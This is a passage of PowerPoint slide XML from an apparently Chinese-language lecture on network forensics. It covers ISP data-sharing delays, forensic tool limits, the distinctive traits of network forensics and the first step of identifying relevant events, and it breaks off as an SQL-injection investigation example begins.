        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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随着保密问题日显重要，很多部门越来越不愿意向其他部门透露信息，包括网络取证数据。例如，现在很多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ISP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在提供涉及到可能经过他们网络设备的可疑网络活动的任何信息之前，会要求出示有关的法律授权文件。这样做虽然有利于保护隐秘并且减少了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ISP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的负担和责任，但同时也延缓了调查进度。特别是在跟踪调查一个正在发生的网络攻击，而且这个攻击经过了几个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ISP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>时，延缓问题是不可忽视的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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608877" y="1337721"/>
            <a:ext cx="2055371" cy="156966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smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="003466"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>6.5</a:t>
            </a:r>
            <a:endPar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614" y="2115293"/>
            <a:ext cx="1781944"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3664248" y="2114659"/>
            <a:ext cx="5644852" cy="7892"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="95250" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="003466"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7213600" y="2785745"/>
            <a:ext cx="1930400" cy="2325370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3653790" y="1661160"/>
            <a:ext cx="4398010" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0"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网络通信数据的检查与分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="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4"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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>网络通信数据的检查与分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="1059582"/>
            <a:ext cx="7272808" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>当一个关注的事件被检测到，分析人员就可以评估、提取、分析网络流量数据，以决定何种事件发生，对企业的网络造成了何种影响。整个过程可能会很简单，例如通过查阅单个数据源的一些日志，发现事件仅仅是一个误报警，也可能会极为复杂，需要一系列的检查并分析多个数据源的数据（这些数据可能会不相关），并手工关联、分析这些数据，以决定可能的目的以及事件的严重程度。然而，即使是简单地验证一些日志项也可能是一件相当耗时的工作。</a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>网络通信数据的检查与分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="1059582"/>
            <a:ext cx="7272808" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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虽然目前的取证工具（例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>软件、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NFAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>软件）可以用来帮助分析、呈现网络通信数据，但这些工具的分析能力依然十分有限，只有经验丰富、受过良好训练的分析人员才能高效地使用它们。而且，分析人员还必须对组网原理、常见的网络层和应用层协议、网络和应用程序的安全产品、网络的威胁和攻击方法等有相当的理解和把握。分析人员还必须十分了解企业的环境，比如网络结构、关键设备（比如防火墙、公开的服务器等）的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址使用情况，以及企业使用的应用软件和操作系统等。如果分析人员理解企业的正常网络计算基线，才能更快更好地开展工作。同时，分析人员必须深刻理解这些网络通信数据源设备的工作机制，方便地获得有关的支持材料，例如入侵检测设备的说明书、文档等，并十分清楚这些数据源的相对价值，才能快速地定位相关数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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6.1.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>网络取证的特点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="877908" y="1131590"/>
            <a:ext cx="7165712" cy="3270126"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>与计算机取证与司法鉴定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(Computer Forensics)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、数字取证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(Digital Forensics)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、互联网取证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(Cyber Forensics)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等概念比较，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网络取证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(Network Forensics)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>突出了以下特征：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>①</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主要研究对象与数据报</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(packets)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>或网络数据流</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(Network Traffic)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>有关，而不仅仅局限于计算机；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为满足证据的实时性和连续性，网络取证是动态的，并且结合入侵前后的网络环境变量，可以重建入侵过程；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>③</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为保证证据的完整性，网络取证有时是分布式的，需要部署多个取证点或取证代理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(Agent)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，而且这些取证点是相关和联动的；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>④</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为实现网络取证，通常需要与网络监控</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(Network Monitoring)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>相结合。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="16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6.5.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>辨认相关的事件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="843558"/>
            <a:ext cx="7272808" cy="3739485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>检查过程的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>第一步</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>识别有关的事件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。通常识别的方法有下面两个：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>①</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>企业内的工作人员发现异常，例如接到报警和用户涉及安全和可操作性相关问题的投诉。分析人员被要求查明相应的网络活动。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>分析人员在例行的查阅安全事件数据（入侵检测数据、网络监控数据、防火墙日志等）过程中，发现了需要进一步查明的事件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>在确认了事件后，需要了解一些事件的基本信息以展开深入调查。一般情况下，可以依据事件数据的来源，直接定位到网络数据源设备（例如入侵检测系统的传感器或者防火墙）以获取更多信息。然而，在有些情况下，比如用户投诉，到底是哪一个数据源包含相关信息或者到底是哪一台主机、哪个网络段出现问题，并不十分明显。分析人员只掌握了一些一般信息，例如报告说四楼的几台机器经常重新启动。虽然更具体的报告会使得检查工作容易些，但一般性的报告至少也为寻找相关数据源的工作提供了一个基本的起点。</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6.5.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>辨认相关的事件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="843558"/>
            <a:ext cx="7272808" cy="3739485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>下面以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务器遭受</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>入侵为例，介绍如何辨认相关的事件。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
